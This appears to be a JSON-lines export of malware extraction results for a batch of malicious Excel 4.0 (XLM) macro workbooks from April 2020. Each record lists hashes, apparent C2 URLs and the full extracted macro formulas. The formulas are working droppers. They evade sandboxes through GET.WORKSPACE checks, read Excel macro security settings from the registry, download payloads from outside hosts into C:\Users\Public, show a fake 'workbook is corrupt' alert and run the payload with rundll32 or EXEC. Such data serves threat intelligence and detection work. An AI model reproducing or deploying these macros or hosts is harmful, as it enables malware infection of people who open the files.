Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p10stPCu4E\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14fa6c5557e316c508d782cc098fd987eda7e9247ec3fef5081694f48d770a05"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14fa6c5557e316c508d782cc098fd987eda7e9247ec3fef5081694f48d770a05","filesize":113664,"md5":"1f2a35ec991376c39a7b39d4eb6605c0","sha1":"b4a84aa6e54f05f0d28827632435cefbb77de5b1","sha256":"14fa6c5557e316c508d782cc098fd987eda7e9247ec3fef5081694f48d770a05","sha512":"2d9f08357ac9b1e4fc2a55b924c65522b4aca2c6b56add05c70978bcdaa5cd2f3e1f61763bd88ce82ab88814c9c25600178774dc032f27dd36e6be26b9fe734d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14fa6c5557e316c508d782cc098fd987eda7e9247ec3fef5081694f48d770a05.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"d0uFvBg05h\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1508b4b9eb87ba53586204bab90e88fd034c4620e5d0db775b30b8b8dda251bb"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"1508b4b9eb87ba53586204bab90e88fd034c4620e5d0db775b30b8b8dda251bb","filesize":167936,"md5":"f87ee2b0d73992883b3d61f392bcf739","sha1":"b4d636b8df1d7e1e70f00697b5b62ae308893e5d","sha256":"1508b4b9eb87ba53586204bab90e88fd034c4620e5d0db775b30b8b8dda251bb","sha512":"a2447cccfd546237886f4f9350cd4d92aa0ae5a4362398e8d90f9870df67b4403519e69acc6b07ce6c9612229388199a2e4ae5cc1dd12ba7b83bb421e60820b9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1508b4b9eb87ba53586204bab90e88fd034c4620e5d0db775b30b8b8dda251bb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l3SmSI4rlc\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"150a2e39c6e24a09b596d65417612daf2ca755da116c08d1a8f59e0601d9dbac"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"150a2e39c6e24a09b596d65417612daf2ca755da116c08d1a8f59e0601d9dbac","filesize":113664,"md5":"5680c3f5aec2f00a80037992b5e99da7","sha1":"9778e78f2ea371b34b8fa07312aeb9796717325f","sha256":"150a2e39c6e24a09b596d65417612daf2ca755da116c08d1a8f59e0601d9dbac","sha512":"a2f6393be9454819e76d71ce631ef9bb146b269cd877545ab464cc463e7f00189816a968be107d2eccc9f17dc921ea4739344e6d591d63de677d4c478efc3ea2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"150a2e39c6e24a09b596d65417612daf2ca755da116c08d1a8f59e0601d9dbac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"3Jy2MjHA4M\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"152263b91bfcd7473f930ca50fe4bb10938823db11b353f9a29fbeea5a4f4e5b"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"152263b91bfcd7473f930ca50fe4bb10938823db11b353f9a29fbeea5a4f4e5b","filesize":168960,"md5":"47664e40b6802178264afc141ba09369","sha1":"70e5c0e41526cc8ff9402bdf93d5c06f3a4357d5","sha256":"152263b91bfcd7473f930ca50fe4bb10938823db11b353f9a29fbeea5a4f4e5b","sha512":"04784c9180f671b1dd9492d5971dd5483ad2301a8bb1f70a38ca44e75d8fc4c7023849927589b0daefaa365085c3febdbfca1fcd296c0507aff86114b527d561","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"152263b91bfcd7473f930ca50fe4bb10938823db11b353f9a29fbeea5a4f4e5b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mP9mScF1m5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15275c0f7feb25bbd1c64d37ea7489849579bca9565239c82cbc6e74c09268fa"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"15275c0f7feb25bbd1c64d37ea7489849579bca9565239c82cbc6e74c09268fa","filesize":212992,"md5":"d88668db71b02d2bc3880fe644fd61c8","sha1":"7dfc0ccfcd9d039bfd73b7b88ad96067e4fa6fa8","sha256":"15275c0f7feb25bbd1c64d37ea7489849579bca9565239c82cbc6e74c09268fa","sha512":"6b92d272505039990c1cedac0739c4ed1b06ef6e106bbc80d8197525446d09a4f8370df0dbe5a9ff40dc12a478498e054d395fb21295b1d842770107b523a7d1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15275c0f7feb25bbd1c64d37ea7489849579bca9565239c82cbc6e74c09268fa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bqMI30Wiy8\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"153a7eb5964078383725d4c55fd421ee44d3893c08664c125bc5a1c73cd0f759"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"153a7eb5964078383725d4c55fd421ee44d3893c08664c125bc5a1c73cd0f759","filesize":141824,"md5":"975499e465c8a9fb7bfdb2c649ea590b","sha1":"1ea46ba7a3b0cf6ac0c50903f856797a6ef9d32d","sha256":"153a7eb5964078383725d4c55fd421ee44d3893c08664c125bc5a1c73cd0f759","sha512":"416a68af2c8c3b15903bd0715f1b6744a0dc1db98482d2ac2c63868c562da58f71accb143de56614c98e6b04728e4a198b4c8e218d89dcff1674ec029afb7ff0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"153a7eb5964078383725d4c55fd421ee44d3893c08664c125bc5a1c73cd0f759.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"YzL0hnQsLV\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1543a9cfd6a2dede5ea2694191e86ff278160d049f7348c467fb630dd15b56ce"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"1543a9cfd6a2dede5ea2694191e86ff278160d049f7348c467fb630dd15b56ce","filesize":145408,"md5":"9f829d98ce5a5df65a6a56e8225f3a10","sha1":"feb46d4e1d77c7e995c0d4185766227a128a6423","sha256":"1543a9cfd6a2dede5ea2694191e86ff278160d049f7348c467fb630dd15b56ce","sha512":"070d3db11bfdedfa6f5fd599088055fd4fa80af15ca7269f3419c979cb599ef2394b36541f8406b4c0ca1de08df22130153e81dbf753896f08ee2d0e722f21f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1543a9cfd6a2dede5ea2694191e86ff278160d049f7348c467fb630dd15b56ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PzvxULkjah\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1543b56b74e14aadcee2108b12575c00365a3e183372887a01f9304fd26c363c"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"1543b56b74e14aadcee2108b12575c00365a3e183372887a01f9304fd26c363c","filesize":112640,"md5":"9ac60d4fd6e5ea99e6ad96ebaddc6e50","sha1":"df71ccc1124193a0f4f8a207e04d9314a721bc8c","sha256":"1543b56b74e14aadcee2108b12575c00365a3e183372887a01f9304fd26c363c","sha512":"7810ce66f8e45b0f0bc7ed7afddf33f7fc4fc5d2846e5a6e3ed9f115e0468e857e6fcabbe540715f74fb86aa34ca35b1538b64972b0978dc3bcfc9b5270c0ccf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1543b56b74e14aadcee2108b12575c00365a3e183372887a01f9304fd26c363c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"155d193ad39036fb74bf77c5b09634f154530300968339c9b58a8af30fe261db"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"155d193ad39036fb74bf77c5b09634f154530300968339c9b58a8af30fe261db","filesize":104448,"md5":"bc67918a3c93132c89a23fc79734c82f","sha1":"b008f5e12e91ea3e3da9c664f1357f8157175345","sha256":"155d193ad39036fb74bf77c5b09634f154530300968339c9b58a8af30fe261db","sha512":"c8a65d9ec55ddcf544a084f29eb14122c6733c20a72c00b79c62d5d0695f50638dfb8257884c36e621498a9ed6bea6a5d85ae1957a8c73acf0e612955e05c91c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"155d193ad39036fb74bf77c5b09634f154530300968339c9b58a8af30fe261db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"cc4Z59vtPf\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15879616dd23fe61db22922769ae7daf25ff26e299e9dc36f5995037566e7d46"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15879616dd23fe61db22922769ae7daf25ff26e299e9dc36f5995037566e7d46","filesize":167936,"md5":"44b62c4ec2acac612ec89f399d74dc29","sha1":"85e5d341794ddb520e41bd502d021188ce177a58","sha256":"15879616dd23fe61db22922769ae7daf25ff26e299e9dc36f5995037566e7d46","sha512":"22b09b7fd1d2877d013d961fd5746018d7a7ed4b9f93872ac4350e7dd2ac9c4efb025a60f1bb4cff6673a14828d94c1c4f3843b2f89095783167503ac8b09318","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15879616dd23fe61db22922769ae7daf25ff26e299e9dc36f5995037566e7d46.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GMT5BUde6f\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"158a00747cf9d0e4e2878761ccc7430584eec6df1afb38cf5de2028d7b7d3196"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"158a00747cf9d0e4e2878761ccc7430584eec6df1afb38cf5de2028d7b7d3196","filesize":112640,"md5":"5a54fec1d63aeda96dde9c8eff4bded3","sha1":"95a808e86a0e822d914855d957014be194c8135b","sha256":"158a00747cf9d0e4e2878761ccc7430584eec6df1afb38cf5de2028d7b7d3196","sha512":"ca13f867e5ce9d8fa143db7d89ae1fced144b4bb11a721c701de8d55965c11a28b705ffb0bb47934535414c9273a7777b2df50213ed68571e109c9519afc7d45","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"158a00747cf9d0e4e2878761ccc7430584eec6df1afb38cf5de2028d7b7d3196.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1594219a89ad143e089b1d3ca356bbf5db45a2a6b330ca0b5c50d6a3bab84b43"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"1594219a89ad143e089b1d3ca356bbf5db45a2a6b330ca0b5c50d6a3bab84b43","filesize":206336,"md5":"ae96014e1d421aa91e71e332b655b92a","sha1":"1ac78681f1174694261fc998081d3a0544aeb3da","sha256":"1594219a89ad143e089b1d3ca356bbf5db45a2a6b330ca0b5c50d6a3bab84b43","sha512":"b28e3f3ddda2ec481d8f0ba412bd4e29d34614b609b0306eaecdaac13b2f390d59c17e5fe9071f0e2d66f8d31cf28d0518454847d37652635f3958f040441d75","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1594219a89ad143e089b1d3ca356bbf5db45a2a6b330ca0b5c50d6a3bab84b43.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Nsqax8GmV7\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1594631753718b04fd836350ab4b06ba7bce703041dcca8057522db8f9bf40b8"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"1594631753718b04fd836350ab4b06ba7bce703041dcca8057522db8f9bf40b8","filesize":185344,"md5":"07d9072c9829a7524f81e3e8fd5a2bce","sha1":"1bb5b88ac458ad43a22b660b864e05e7ffcbb941","sha256":"1594631753718b04fd836350ab4b06ba7bce703041dcca8057522db8f9bf40b8","sha512":"12f20eb2eefac730a8aba3cdb7aaf0e9ae85902a331b8f3a08ae6cc668904a9c3f2fc50dc34332a898e6c24f54b8ff79375852a22eebac16c5a6435c09c507ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1594631753718b04fd836350ab4b06ba7bce703041dcca8057522db8f9bf40b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15a66ecde96003dbb1b38c2671bf4de458ee3c492f07b7078ca8ea25aa1f995c"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15a66ecde96003dbb1b38c2671bf4de458ee3c492f07b7078ca8ea25aa1f995c","filesize":152576,"md5":"dce1aed80896cbe5ee073437bafaa7ef","sha1":"f402c8164582821e03380db3ec8661cda6923051","sha256":"15a66ecde96003dbb1b38c2671bf4de458ee3c492f07b7078ca8ea25aa1f995c","sha512":"2edebb295ee819140721488515232b924adf644167f22787e2ddc914d0d6d5af8914c5c2c571fde7149f0c6d8732588da97961c8873d8264067cddf6061f8bc7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15a66ecde96003dbb1b38c2671bf4de458ee3c492f07b7078ca8ea25aa1f995c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NThFCxCd3j\",TRUE)\nGOTO(R$1C$10)"}}}]}
